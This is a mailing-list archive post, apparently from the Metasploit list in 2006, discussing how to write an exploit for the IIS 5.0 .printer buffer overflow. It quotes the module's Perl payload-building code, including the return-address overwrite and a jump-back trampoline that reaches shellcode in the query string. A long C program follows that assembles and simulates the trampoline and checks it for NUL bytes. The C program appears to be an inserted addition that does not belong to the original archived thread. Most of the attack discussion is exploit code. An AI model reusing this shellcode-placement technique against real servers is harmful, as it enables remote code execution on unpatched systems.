Metasploit mailing list archives
iis50_printer_overflow
From: hdm at metasploit.com (H D Moore)
Date: Thu, 2 Mar 2006 14:57:30 -0600
On Thursday 02 March 2006 14:49, Sonixxfx wrote:
I am trying to write an exploit for the "iis50_printer_overflow"
[ snip ]
The problem seems to be that I have little space available after the return address for the payload. I believe there are about 240 bytes available. So my question is: how can I make use of both the space available after the return address and the space before it?
If you look at our exploit, we cheat. We stick our shellcode into the query string and then find it again by dereferencing ebx+96 (which happens to be a pointer that, when 256+64 is added to it, leads back into our shellcode):

    my $pattern = $self->MakeNops(280);
    substr($pattern, 268, 4, pack("V", $target->[1]));

    # payload is at: [ebx + 96] + 256 + 64
    $pattern .= "\x8b\x4b\x60";    # mov ecx, [ebx + 96]
    $pattern .= "\x80\xc1\x40";    # add cl, 64
    $pattern .= "\x80\xc5\x01";    # add ch, 1
    $pattern .= "\xff\xe1";        # jmp ecx

    my $request = "GET http://$pattern/null.printer?$shellcode...
B.t.w., nice-looking man this morning on your website, Metasploit ;)
That lovely image appears if you browse the web site with a hostname that doesn't appear to be 'metasploit.com' or one of our other domains. Let me know what URL you used to access the web site - it could be a bug. The purpose is to prevent people from hotlinking to images we host on our server. -HD
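The trampoline HD describes is short enough to check offline before sending it. The following is an added example, not code from the Metasploit module or from anyone in this thread: it assembles the same four instructions (mov ecx,[ebx+disp8]; add cl,imm8; add ch,imm8; jmp ecx) for arbitrary operands, then runs them against a constructed register and memory model to see where jmp ecx lands. The ebx value, the pointer stored at [ebx+96], and all function names are made up for the illustration. Two properties matter in practice and are both checked: the stub must contain no 0x00 byte (it travels inside the URL host name), and because add cl / add ch are 8-bit adds, a carry out of cl is simply lost, so the "+320" only holds when the pointer's low byte plus 64 does not exceed 0xff.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Added example, not the Metasploit module's code. Assembles the
 * trampoline quoted above for arbitrary operands and executes it
 * against a constructed ebx/memory model so the landing address,
 * NUL-freeness and the lost-carry pitfall can be checked offline. */

#define STUB_LEN 11
#define BAD_TARGET 0xffffffffu

/* mov ecx,[ebx+disp8] ; add cl,lo ; add ch,hi ; jmp ecx */
size_t build_stub(uint8_t *out, uint8_t disp8, uint8_t lo, uint8_t hi)
{
    out[0] = 0x8b; out[1] = 0x4b; out[2]  = disp8; /* mov ecx, [ebx+disp8] */
    out[3] = 0x80; out[4] = 0xc1; out[5]  = lo;    /* add cl, lo           */
    out[6] = 0x80; out[7] = 0xc5; out[8]  = hi;    /* add ch, hi (hi*256)  */
    out[9] = 0xff; out[10] = 0xe1;                 /* jmp ecx              */
    return STUB_LEN;
}

/* 1 if no byte of the assembled stub is 0x00 (a NUL would end the
 * host-name string the stub is embedded in), else 0. */
int stub_nul_free(uint8_t disp8, uint8_t lo, uint8_t hi)
{
    uint8_t s[STUB_LEN];
    size_t n = build_stub(s, disp8, lo, hi);
    for (size_t i = 0; i < n; i++)
        if (s[i] == 0) return 0;
    return 1;
}

/* Decodes exactly the encodings build_stub emits and returns the address
 * jmp ecx would transfer to, or BAD_TARGET on anything unexpected.
 * disp8 is sign-extended as the CPU does; the 8-bit adds wrap inside
 * cl/ch and never carry into the neighbouring byte. */
uint32_t run_stub(const uint8_t *s, size_t len, uint32_t ebx,
                  uint32_t (*read32)(uint32_t addr))
{
    uint32_t ecx = 0;
    size_t i = 0;
    while (i + 1 < len) {
        if (s[i] == 0xff && s[i + 1] == 0xe1)          /* jmp ecx */
            return ecx;
        if (i + 2 >= len) break;
        uint8_t imm = s[i + 2];
        if (s[i] == 0x8b && s[i + 1] == 0x4b) {        /* mov ecx,[ebx+disp8] */
            int32_t disp = (imm & 0x80) ? (int32_t)imm - 256 : (int32_t)imm;
            ecx = read32(ebx + (uint32_t)disp);
        } else if (s[i] == 0x80 && s[i + 1] == 0xc1) { /* add cl, imm8 */
            ecx = (ecx & 0xffffff00u) | (uint8_t)((ecx & 0xff) + imm);
        } else if (s[i] == 0x80 && s[i + 1] == 0xc5) { /* add ch, imm8 */
            ecx = (ecx & 0xffff00ffu) |
                  ((uint32_t)(uint8_t)(((ecx >> 8) & 0xff) + imm) << 8);
        } else {
            break;
        }
        i += 3;
    }
    return BAD_TARGET;
}

/* Constructed memory model: ebx and the word at [ebx+96] are invented. */
static const uint32_t FAKE_EBX = 0x00f0e000u;
static uint32_t fake_ptr_at_ebx96;

static uint32_t fake_read32(uint32_t addr)
{
    return addr == FAKE_EBX + 96 ? fake_ptr_at_ebx96 : 0u;
}

/* Where the module's stub (disp 96, +64, +256) lands for a given pointer. */
uint32_t landing_for(uint32_t ptr_value)
{
    uint8_t stub[STUB_LEN];
    size_t n = build_stub(stub, 96, 64, 1);
    fake_ptr_at_ebx96 = ptr_value;
    return run_stub(stub, n, FAKE_EBX, fake_read32);
}

int main(void)
{
    uint8_t stub[STUB_LEN];
    size_t n = build_stub(stub, 96, 64, 1);
    printf("stub:");
    for (size_t i = 0; i < n; i++) printf(" %02x", stub[i]);
    printf("  nul-free=%d\n", stub_nul_free(96, 64, 1));
    /* low byte 0xa0 + 64 fits: lands exactly at ptr + 320 */
    printf("ptr 0x%08x -> 0x%08x (ptr+320 = 0x%08x)\n", 0x00c8f1a0u,
           landing_for(0x00c8f1a0u), 0x00c8f1a0u + 320u);
    /* low byte 0xf0 + 64 overflows cl: carry is lost, lands 256 short */
    printf("ptr 0x%08x -> 0x%08x (ptr+320 = 0x%08x)\n", 0x00c8f1f0u,
           landing_for(0x00c8f1f0u), 0x00c8f1f0u + 320u);
    return 0;
}
```

The second case in main is the caveat worth remembering when reusing this trick with a different pointer: the stub is only correct for pointers whose low byte is at most 0xff minus the cl immediate, and a NUL in either immediate (for instance a +256 offset written as add cl,0) silently truncates the request, which stub_nul_free catches before the packet goes out.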
Current thread:
- iis50_printer_overflow Sonixxfx (Mar 02)
- iis50_printer_overflow H D Moore (Mar 02)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow Dave Killion (Mar 04)
- iis50_printer_overflow zodiac (Mar 04)
- iis50_printer_overflow Sonixxfx (Mar 07)
- iis50_printer_overflow H D Moore (Mar 07)
- iis50_printer_overflow Michael Boman (Mar 08)
- iis50_printer_overflow Peter Lee (Mar 08)
- iis50_printer_overflow pagvac (Mar 09)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow H D Moore (Mar 02)
- iis50_printer_overflow pagvac (Mar 09)